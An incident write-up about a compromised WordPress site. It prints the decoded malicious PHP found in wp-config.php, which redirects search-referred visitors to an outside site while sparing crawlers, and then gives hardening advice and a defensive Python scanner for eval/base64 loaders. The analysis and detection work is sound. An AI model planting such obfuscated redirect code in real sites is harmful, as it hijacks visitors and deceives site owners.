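Today the WordPress site of a sxyseo user developed a strange problem:
Visiting it directly works normally, but arriving from a search engine redirects to a different website.
For example, visiting sxyseo directly is fine, but searching Google for site:sxyseo.com and then clicking a result redirects to someone else's site.
Clearly, every request carrying an HTTP Referer was being redirected, so my first guess was that .htaccess had been injected with malicious code. On inspection, though, .htaccess was fine.
I then suspected that WordPress itself had been injected, because a redirect that depends on the HTTP Referer is the work of either .htaccess or PHP itself.
The user downloaded the files, and the Windows antivirus immediately flagged a virus. The infected file was wp-config.php.
Opening wp-config.php confirmed it: a piece of code had been injected at the top: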
```php
eval(base64_decode("...")); // base64 payload not preserved on this page
```
Decoding the base64 gives the following code:
```php
error_reporting(0);                      // hide any errors from the site owner
$qazplm=headers_sent();
if (!$qazplm){                           // a redirect header can only be sent before output starts
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
            // The Referer must look like a search engine, URL shortener or social site.
            // The two preg_match patterns are kept as printed; their inner slashes are unescaped.
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler")
                or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport")
                or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru")
                or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly")
                or stristr($referer,"tinyurl.com")
                or preg_match("/yandex.ru/yandsearch?(.*?)&lr=/",$referer)
                or preg_match ("/google.(.*?)/url?sa/",$referer)
                or stristr($referer,"myspace.com") or stristr($referer,"facebook.com")
                or stristr($referer,"aol.com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://www.isfart.fartit.com/");
                    exit();
                }
            }
        }
    }
}
```
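This code is rather amusing: the redirect only fires when the request comes from a user's browser and that browser is not IE7 or IE6. In other words, the code does not interfere with search engine crawling. Of course not: the compromised site is doing the attacker's work for them, so they want search engines to keep crawling it normally.
Over the last two years, malicious code injection into WordPress has become very common, so WordPress users should:
- Be cautious about installing plugins;
- Be cautious about installing themes of unknown origin;
- Always upgrade WordPress promptly;
- Set file permissions correctly. Don't follow the tutorials that tell you to blindly set everything to 0777.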
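
A static check for the two problems described in this post, as an added example that is not part of the original post: it finds `eval(base64_decode(...))` wrappers in PHP files, decodes them without executing anything, and flags world-writable files such as those set to 0777. The names `decode_payloads`, `scan_tree` and the indicator list are assumptions chosen for this example.

```python
import base64, binascii, os, re, stat

# Matches eval(base64_decode("...")) with single or double quotes around the blob.
EVAL_B64 = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=\s]+)[\"']\s*\)\s*\)")
# Strings that, inside a decoded payload, suggest a conditional redirect (assumed list).
INDICATORS = (b"HTTP_REFERER", b"HTTP_USER_AGENT", b"header(", b"Location:")

def decode_payloads(data):
    """Return the decoded bytes of every eval(base64_decode(...)) argument; nothing is executed."""
    out = []
    for m in EVAL_B64.finditer(data):
        try:
            out.append(base64.b64decode(m.group(1)))
        except (binascii.Error, ValueError):
            out.append(b"")  # malformed base64 inside eval() is still worth reporting
    return out

def scan_tree(root):
    """Walk root and report PHP files that carry encoded eval payloads or are world-writable."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            payloads = decode_payloads(data)
            hits = sorted({i.decode() for p in payloads for i in INDICATORS if i in p})
            mode = stat.S_IMODE(os.stat(path).st_mode)
            writable = bool(mode & stat.S_IWOTH)  # true for 0777, 0666, ...
            if payloads or writable:
                findings.append({"path": path, "payloads": len(payloads), "indicators": hits,
                                 "world_writable": writable, "mode": oct(mode)})
    return findings

if __name__ == "__main__":
    import sys
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(finding)
```

Run it against a downloaded copy of the site or the document root; a clean wp-config.php has no reason to contain an encoded `eval`, so any hit there deserves a manual look at the decoded bytes.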